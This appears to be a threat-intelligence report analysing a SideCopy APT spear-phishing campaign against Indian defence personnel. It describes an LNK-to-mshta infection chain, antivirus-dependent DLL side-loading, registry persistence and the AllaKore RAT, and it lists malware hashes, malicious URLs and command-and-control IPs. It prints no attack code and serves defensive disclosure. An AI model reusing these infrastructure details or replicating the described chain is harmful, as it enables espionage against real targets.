返回 TI 主页

Background

In September 2020, Quick Heal revealed an espionage operation against the Indian Defense forces and armed forces personnel and named it Operation SideCopy. The operation began in early 2019, and its attackers mainly used the TTPs of the Sidewinder APT group to carry out attacks, hence it was named Operation SideCopy.

In July 2021, Cisco Talos researchers tracked the attackers behind Operation SideCopy as an independent group and named it the SideCopy APT group. The report disclosed that the group used various attack weapons, including CetaRAT, ReverseRAT, MargulasRAT, AllakoreRAT, and several C# plugins [1].

Recently, during our continuous tracking of the SideCopy group, we discovered some interesting samples.


Overview

In this attack activity, SideCopy's infection chain is relatively consistent with the previous attack activity. It uses a malicious LNK file as the entry point, followed by a complex infection chain involving multiple layers of file nesting to pass the final payload. Based on analysis, some characteristics of this attack activity are as follows:

  1. Spear-phishing emails, with LNK files in compressed packages as the attack entry point;
  2. Loading and executing subsequent payloads in memory without files;
  3. The final payload is an improved open-source Trojan horse written in Delphi or a new Trojan horse written in C++;
  4. The bait content is related to the Indian Ministry of Defense.

The attack process is shown in the following figure:


Sample Analysis

0x01 Basic Information

The captured sample is a compressed package with the following basic information:

- -
Filename Grant-of-Risk-and-Hardship-Allowance-JCOs-OR.zip
MD5 577419F202182F6E933C1CF83EF922EA
File size 325484 bytes
File type Zip

After decompression, it contains a hidden folder “Adobe” and a bait LNK file. The LNK file name is "Grant of Risk and Hardship Allowance."

Analyzing the LNK file, it accesses the C2 using mshta.exe in the system to download and execute subsequent payloads.


0x02 Phase One

Accessing the link in the LNK file will redirect to “https://kcps.edu[.]in/css/fonts/files/docs/graentsodocumentso/ganeshostwoso/snbtoolswires.hta” to download a piece of JS code to execute.

Its main function is to load DLL in memory, decrypt the embedded data in the JS code through the functions in the DLL, and drop the PDF bait.

The function "openthefile" decrypts and releases the PDF bait.

The displayed PDF bait is shown below:

Then, it obtains the information of installed antivirus software, concatenates it with the string "anvaro =," and uploads it to “https://kcps.edu[.]in/css/fonts/files/avena/” using the POST method.

Creates the directory “C:\ProgramData\HP”, accesses the C2 to download data and saves it in “C:\ProgramData\HP\jquery.hta” and “C:\ProgramData\HP\jscy.hta” files, and then executes them.


0x03 Phase Two

The downloaded HTA files are similar to Phase One. They load DLL in memory and first collect information of installed antivirus software in the system using WMI. Then, it uses a piece of hardcoded data and antivirus software information as parameters to call the SearchProducts function in the DLL.

In the SearchProducts function, it first compares the antivirus software to decide how to start the subsequent payloads. The antivirus software information is as follows:

- -
antivirus software information
Kaspersky Avira
Quick Heal Bitdefender
Avast WindowsDefender

When the Indian antivirus software "Quick Heal" is present, the first step is to copy Credwiz.exe file in the system to the directory “C:\Users\Public\smitpr” and rename it as “crezly.exe”. Then, decrypt the DLL data and name it as “DUser.dll” in the “C:\Users\Public\smitpr” directory. Next, decrypt the EXE data and drop the program “simsre.exe” in the “smitpr” directory. Finally, sleep for 30 seconds, and then call the released “crezly.exe” program to side-load the malicious “DUser.dll”.

During the execution, a bat file is generated, which adds a startup item for the crezly.exe program through the registry.

When the antivirus software is Kaspersky, Avast, Bitdefender, WindowsDefender, or others, the way of releasing the malicious component is basically the same as that of the Indian antivirus software "Quick Heal", except that it will sleep for one minute and then start the released simsre.exe program directly, and the program added to the startup item through the registry is also simsre.exe.

It is worth mentioning that when it is not the Indian antivirus software "Quick Heal", a tmplate.txt file will be generated in the %temp% directory for logging, and the author recorded in the log is "Mahesh Chand", who is an Indian and claims to be a former Microsoft regional director on his Twitter profile.


AllaKore RAT

The released simsre.exe is a AllaKore RAT (also known as Cyrus) commonly used by SideCopy. Its source code is open source on GitHub and has been modified by the SideCopy group as part of its own arsenal. The file information is as follows:

- -
Filename simsre.exe
MD5 087E366A4BECCBECB7D7CDB5C2F73088
File size 8507904 bytes
File type EXE

The IP address that captured Allakore RAT accessed is 185.229.119.60, and the port is 9134. Its main functions include:

  • Keylogger
  • Screenshots
  • List folders and files
  • Upload/download files
  • Steal clipboard data
  • Change wallpaper
  • Remote control

DUser.dll

The sideloaded DUser.dll is actually a loader that loads and executes the released simsre.exe.


Attribution & Association

During the analysis of the sample, we found that this attack mainly targets the India region. First, the bait content is mainly related to the Indian Ministry of Defense, and second, the default decoding method was selected during decryption. The bait content and some subsequent payloads can only be correctly decrypted if the system region setting of the current computer is set to English (India).

In terms of code logic analysis of captured attack samples, we found that the malicious code used in this attack is almost identical to the commonly used attack methods of the SideCopy group.

By associating with the initial lnk file of this attack, we also discovered another similar attack sample.

Its bait is the documentation related to the development of the nuclear-capable medium-range submarine-launched ballistic missile (K4 missile) for the armed Alihant-class submarines of the Indian Defense Research and Development Organization (DRDO). The bait content is as follows:

Its execution process is basically the same as the above analysis. The difference is that its final payload DUser.dll is a program written in C++ language, with a high undetected rate on VirusTotal. Its C2 is 144.91.72.17:8080, and it also carries PDB path information.

In addition, during the extended analysis, we also found a large number of lnk file-based attack samples recently used by the SideCopy group.

In last year, we also discovered that the SideCopy group used pornographic images as lnk file icons for attacks, which can be described as a tried and tested method.


Summary

The SideCopy group mainly copies the TTPs of the Sidewinder APT group for attacks. It has come to public eye in recent years, and its attack methods and weapon code are relatively immature compared to other threat groups in the same region, with most of its tools using open source code and tools available on the internet. More importantly, we have previously disclosed its attacks on multiple platforms such as Linux and macOS [2]. QiAnXin Threat Intelligence Center will conduct long-term traceability and follow-up on this threat actor, timely discovering security threats and responding to them.

The captured samples mainly targets the South Asian region, and domestic users are not affected. The QiAnXin Red Raindrop team reminds users to beware of waterhole attacks and not to open links with unknown sources shared on social media, not to click on email attachments from unknown sources, not to run unknown files with exaggerated titles, and not to install apps from unofficial sources. Also, be sure to back up important files in a timely manner and update and install patches.

If there is a need to run an application of unknown origin, you can first use the QiAnXin Threat Intelligence File Analysis Platform (https://sandbox.ti.qianxin.com/sandbox/page) for identification. Currently, all products based on QiAnXin Threat Intelligence Center's threat intelligence data, including QiAnXin Threat Intelligence Platform (TIP), Tianqing, Tianyan Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Situation Awareness, all support accurate detection of such attacks.


IOCs

MD5

577419F202182F6E933C1CF83EF922EA

3E3D3F78A07BAB5A3342E0414E48D787

087E366A4BECCBECB7D7CDB5C2F73088

26E41AF2CA9EA82C244C1AA1EC77654A

FA6C832E22F978B8210C0630DB69E6A2

EFCC2BF765993711CC9E4E86D2EBB876

191C389140293C782D7A2304893151E2

6528A9F0AF30DF7F4211EF8B341ACC2E

0725318B4F5C312EEAF5EC9795A7E919

AB11B91F97D7672DA1C5B42C9ECC6D2E

CBAA7FC86E4F1A30A155F60323FDB72A

036DA574B5967C71951F4E14D000398C

2E19B7A2BBDC8082024D259E27E86911

087E366A4BECCBECB7D7CDB5C2F73088

3F22B345ED1F9E244DB034F9AF49E707

EDE163036A1754C71D6FF11B266B91CE

5BE4E4884F4E021BA975CBED0A7E9C25

F7D1E515CB84F6DC2D0349AB93BD4E05

63789CACECC1ABD9669344516ADB4120

9B06472E5ACF2311D0AF62D638A8E51A

D129B81C1D40C34AC628835E144A4740

BA2ADA448B8471789C0EF3B3345597FE

6B3F45F7A6758D198A317DE43D51E669

A65EB385C9019C712EA513E4C5C25152

1A1C8C0F5CAFB7DF661086BCB804154C

0C44DA9103FB26DAFC710E83E95AD1C2

61427F7A200D7A21C1CF38FFE2FD4EE5

441F580A36757CF20493029B055F581E

URL

https://kcps.edu[.]in/css/fonts/files/docs/graentsodocumentso/ganeshostwoso/snbtoolswires.hta

https://kcps.edu[.]in/css/fonts/files/avena/

https://kcps.edu[.]in/css/fonts/files/ntsfonts/

https://kcps.edu[.]in/css/fonts/files/jquery/

https://www[.]cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso/pantomime.hta

https://cornerstonebeverly[.]org/js/files/ntfonts/avena/

https://cornerstonebeverly[.]org/js/files/ntfonts/

https://hpuniversity[.]in/uploads/files/women/start

https://hpuniversity[.]in/uploadsssss/files/file2/file2.zip

https://hpuniversity[.]in/uploadsssss/files/file3/file3.zip

https://hpuniversity[.]in/uploadsssss/files/women/Women.zip

https://hpuniversity[.]in/uploadsssss/files/survey/Survry.zip

http://hpuniversity[.]in/filessss/software/SoftWare.zip

https://hpuniversity[.]in/documents/women/Women.zip

https://hpuniversity[.]in/ documents /assignment1/ assignment1.zip

https://hpuniversity[.]in/filessss/principles/Principles.zip https://hpuniversity[.]in/documents/survey/start/2.hta

IP

89.117.63.146:9921

185.229.119.60:9134

144.91.72.17:8080


Reference

[1]. https://blog.talosintelligence.com/2021/07/sidecopy.html

[2]. https://ti.qianxin.com/blog/articles/Sidecopy-dual-platform-weapon/

SIDECOPY APT